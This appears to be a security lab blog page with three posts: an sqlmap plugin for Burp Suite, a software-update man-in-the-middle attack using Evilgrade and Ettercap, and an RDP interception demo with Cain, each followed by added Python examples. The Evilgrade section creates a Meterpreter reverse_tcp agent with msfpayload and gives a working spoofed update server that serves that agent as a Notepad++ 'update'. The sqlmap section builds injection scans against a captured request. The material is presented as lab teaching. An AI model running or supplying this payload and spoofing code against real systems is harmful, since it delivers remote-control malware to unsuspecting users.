Showing posts from September, 2012

MySQLDumper Exploit

------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Sqlmap plugin for BurpSuite

Download the SQLmap plugin for Burp Suite at:

1 - Store it in the same folder as Burp Suite.
2 - Use this command to start Burp Suite with the plugin (on Linux): java -classpath gason-0.9.5.jar:burpsuite_v1.4.01.jar burp.StartBurp
3 - After it starts, right-click a request in the Proxy tab (Action menu) and you will see "send to sqlmap".

Configure your web browser to use the Burp Suite proxy. Now you can use it:
1 - Send a request from the browser through Burp Suite.
2 - Action / Send to SQLmap.

In the SQLmap options window you must:
1 - Configure the SQLmap bin path.
2 - Choose the action.
3 - Set options if you need them, then run.

And this is the result:
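The plugin's job is to take the request Burp captured and hand it to sqlmap with the right switches. The following is an added example written for this page, not the gason plugin's own code: it parses a raw proxied request and builds the sqlmap command line (URL, POST body, cookie, testable parameters). The request, the host name and the sqlmap path are constructed for the demo.

```python
"""Added example (not gason's code): raw Burp request -> sqlmap argv."""
import shlex
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: a proxied POST with a query string, a cookie and a body.
RAW_REQUEST = (
    "POST /login.php?ref=home HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Cookie: PHPSESSID=abc123; lang=en\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=admin&pass=secret"
)

def parse_request(raw):
    """Split a raw HTTP request into method, path, headers (lower-cased) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def injectable_params(path, body):
    """Names of every parameter sqlmap could test: query string first, then POST body."""
    names = [k for k, _ in parse_qsl(urlsplit(path).query, keep_blank_values=True)]
    names += [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    return names

def sqlmap_argv(raw, sqlmap_bin="/usr/bin/sqlmap", scheme="http", extra=()):
    """Build the sqlmap argv for a captured request.

    sqlmap_bin plays the role of the plugin's "SQLmap bin path" setting; the
    default location is an assumption for the demo. Only real sqlmap switches
    are used: -u, --data, --cookie, -p and --batch.
    """
    method, path, headers, body = parse_request(raw)
    url = f"{scheme}://{headers['host']}{path}"
    argv = [sqlmap_bin, "-u", url, "--batch"]
    if method != "GET" and body:
        argv += ["--data", body]
    if "cookie" in headers:
        argv += ["--cookie", headers["cookie"]]
    params = injectable_params(path, body)
    if params:
        argv += ["-p", ",".join(params)]
    argv += list(extra)
    return argv

if __name__ == "__main__":
    # Print a shell-safe command line, the same thing the plugin runs for you.
    print(shlex.join(sqlmap_argv(RAW_REQUEST, extra=["--level", "3"])))
```

Without the plugin, the same handoff is "save the request from Burp to a file and run sqlmap -r request.txt"; the explicit switches above are worth knowing because they are what you edit when a scan needs a narrower parameter list.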

Software Update MITM Exploit using Evilgrade and Ettercap

Many programs check for updates. Sometimes the update check runs over SSL, but commonly updates are delivered over plain HTTP, which can be manipulated. Evilgrade is a modular exploit tool that spoofs software update responses and delivers an executable of your choosing to the victim. In this lab I used Evilgrade with Ettercap.

Your victim machine runs an unstable Notepad++:
1 - Unstable version
2 - Victim IP and DNS

Install Evilgrade on the BackTrack system:
1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade

Prepare the Meterpreter executable to deliver to the victim:
1 - # ifconfig eth0 (get your BackTrack IP address)
2 - # cd /root/isr-evilgrade/agent/ (go to the evilgrade agent directory)
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8080 X > agent.exe (create the Meterpreter executable)
4 - # ls (verify agent.exe)
1 -
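The part of the lab that does the damage is the spoofed answer to the update check. The following is an added example written for this page, not Evilgrade's own code: once Ettercap's DNS spoofing sends the victim's update request to the attacker, this responder tells the client it is out of date and serves agent.exe as the "update". The manifest follows the WinGUP-style XML that Notepad++'s updater reads; the exact tag names, the attacker address, the version strings and the agent bytes are assumptions constructed for the demo.

```python
"""Added example (not Evilgrade's code): a minimal spoofed update server."""
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

ATTACKER_HOST = "192.168.1.10"   # assumed BackTrack address (ifconfig eth0 in the lab)
AGENT_PATH = "/agent.exe"        # the msfpayload output from the lab
AGENT_BYTES = b"MZ<constructed stand-in for agent.exe>"

def as_tuple(version):
    """'5.9.3' -> (5, 9, 3) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in version.split("."))

def bump_version(reported):
    """Return a version strictly newer than the one the client reported."""
    parts = list(as_tuple(reported))
    parts[-1] += 1
    return ".".join(str(p) for p in parts)

def spoofed_manifest(client_version, attacker_host=ATTACKER_HOST):
    """Manifest telling any client it is out of date and where to fetch the 'update'."""
    gup = ET.Element("GUP")
    ET.SubElement(gup, "NeedToBeUpdated").text = "yes"
    ET.SubElement(gup, "Version").text = bump_version(client_version)
    ET.SubElement(gup, "Location").text = f"http://{attacker_host}{AGENT_PATH}"
    return ET.tostring(gup, encoding="unicode")

def victim_decision(manifest_xml, installed_version):
    """Model of the updater: the URL it will download and run, or None.

    Nothing here checks who produced the manifest or where it came from,
    which is exactly why a spoofed answer over plain HTTP works."""
    gup = ET.fromstring(manifest_xml)
    if gup.findtext("NeedToBeUpdated", "no").strip().lower() != "yes":
        return None
    if as_tuple(gup.findtext("Version", "0")) <= as_tuple(installed_version):
        return None
    return gup.findtext("Location")

class FakeUpdateHandler(BaseHTTPRequestHandler):
    """Serves the manifest for any version check and the agent for AGENT_PATH."""
    def do_GET(self):
        url = urlsplit(self.path)
        if url.path == AGENT_PATH:
            self._reply("application/octet-stream", AGENT_BYTES)
            return
        # Assumed query shape: the client reports its version as ?version=x.y.z
        version = parse_qs(url.query).get("version", ["0.0.0"])[0]
        self._reply("text/xml", spoofed_manifest(version).encode())

    def _reply(self, content_type, body):
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    # Port 80: DNS spoofing changes only the address the victim resolves, not the
    # port it connects to. The Meterpreter handler on 8080 is a separate listener.
    HTTPServer(("0.0.0.0", 80), FakeUpdateHandler).serve_forever()
```

The same responder is useless against an updater that fetches the manifest over TLS with certificate validation or verifies a signature on it before trusting Location, which is the caveat behind the opening sentence about HTTP versus SSL.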

RDP Man in The Middle

Remote Desktop Protocol (RDP) is used in most Windows environments. It is often vulnerable to man-in-the-middle attacks: you can decrypt the session to reveal keystrokes. Today we will demo this.

Note: Newer RDP versions can employ a certificate and TLS encryption, but self-signed certificates are often used, so a client that clicks through the certificate warning gains nothing from it. Cain is the only tool we know of that can attack RDP (even with TLS).

We need three systems:
•    RDP server
•    RDP client (victim)
•    Attacker (running Cain on Windows XP)

Note:
•    No security suite (disable the firewall)
•    Note the IP address of each
•    Install Cain & Abel and accept all defaults except WinPcap

1.    On the RDP server system, create an admin user account:
1 - Create an administrator account
2 - Then add it to the Administrators group
3 - Verify its creation

2.    Enable RDP on the RDP server system:
1 - Right-click My Computer
2 - Choose Properties
3 - Choose the Remote tab
4 - Check "Allow users to connect remotely to this computer". Click OK on the confirmation dialog.
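Which security layer an RDP session ends up on is decided before any credentials move, in the X.224 Connection Request / Connection Confirm exchange (MS-RDPBCGR 2.2.1.1 and 2.2.1.2). The following is an added example written for this page, not Cain's code: it builds and parses that exchange and shows the server-side policy check that refuses to fall back to Standard RDP Security, the level the lab above leaves enabled. The cookie, the addresses and the byte strings are constructed for the demo; the layouts and constant values are from the specification.

```python
"""Added example (not Cain's code): RDP security negotiation and server policy."""
import struct

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2     # requestedProtocols bits
TYPE_NEG_REQ, TYPE_NEG_RSP, TYPE_NEG_FAILURE = 0x01, 0x02, 0x03  # rdpNegData type field
SSL_REQUIRED_BY_SERVER, HYBRID_REQUIRED_BY_SERVER = 0x1, 0x5     # failureCode values

def build_connection_request(requested_protocols, cookie=b""):
    """Client -> server: TPKT header + X.224 CR-TPDU + optional cookie + RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_NEG_REQ, 0, 8, requested_protocols)
    variable = cookie + neg_req
    # LI counts every X.224 byte after itself: 6 fixed bytes plus the variable part.
    x224 = struct.pack("!BBHHB", 6 + len(variable), 0xE0, 0, 0, 0) + variable
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224

def parse_connection_request(pdu):
    """Return (cookie, requestedProtocols) from a Connection Request PDU.

    A legacy client sends no RDP_NEG_REQ at all; the server must then treat the
    request as asking for Standard RDP Security, so that case is made explicit."""
    version, _, total = struct.unpack("!BBH", pdu[:4])
    if version != 3 or total != len(pdu):
        raise ValueError("bad TPKT header")
    li, code = pdu[4], pdu[5]
    if code != 0xE0:
        raise ValueError("not an X.224 Connection Request")
    variable = pdu[11:5 + li]
    if len(variable) >= 8 and variable[-8] == TYPE_NEG_REQ:
        cookie, neg = variable[:-8], variable[-8:]
        _, _, length, protocols = struct.unpack("<BBHI", neg)
        if length != 8:
            raise ValueError("bad RDP_NEG_REQ length")
        return cookie, protocols
    return variable, PROTOCOL_RDP

def server_confirm(requested_protocols, require_nla=True, allow_standard_rdp=False):
    """Server policy -> the rdpNegData of the Connection Confirm (RSP or FAILURE).

    require_nla mirrors "allow connections only from computers running Remote
    Desktop with Network Level Authentication"; allow_standard_rdp mirrors the
    lab's default, where the legacy security layer is still accepted."""
    if requested_protocols & PROTOCOL_HYBRID:
        return struct.pack("<BBHI", TYPE_NEG_RSP, 0, 8, PROTOCOL_HYBRID)
    if require_nla:
        return struct.pack("<BBHI", TYPE_NEG_FAILURE, 0, 8, HYBRID_REQUIRED_BY_SERVER)
    if requested_protocols & PROTOCOL_SSL:
        return struct.pack("<BBHI", TYPE_NEG_RSP, 0, 8, PROTOCOL_SSL)
    if allow_standard_rdp:
        return struct.pack("<BBHI", TYPE_NEG_RSP, 0, 8, PROTOCOL_RDP)
    return struct.pack("<BBHI", TYPE_NEG_FAILURE, 0, 8, SSL_REQUIRED_BY_SERVER)

def selected_protocol(neg_data):
    """Decode the server's answer: the chosen protocol, or None when it refused."""
    typ, _, _, value = struct.unpack("<BBHI", neg_data)
    return value if typ == TYPE_NEG_RSP else None

if __name__ == "__main__":
    # A modern client offers TLS and NLA; a request carrying only PROTOCOL_RDP,
    # whether from an old client or altered in transit, is what the policy rejects.
    req = build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID, b"Cookie: mstshash=alice\r\n")
    print(req.hex())
    _, protos = parse_connection_request(req)
    print("modern client ->", selected_protocol(server_confirm(protos)))
    print("RDP-only, NLA required ->", selected_protocol(server_confirm(PROTOCOL_RDP)))
    print("RDP-only, lab default ->",
          selected_protocol(server_confirm(PROTOCOL_RDP, require_nla=False, allow_standard_rdp=True)))
```

With the lab's defaults the server happily confirms Standard RDP Security, which is the session the demo decrypts; the first 19 bytes produced for a request with no cookie match the familiar 03 00 00 13 0e e0 ... prefix seen in captures, so the builder can be checked against real traffic.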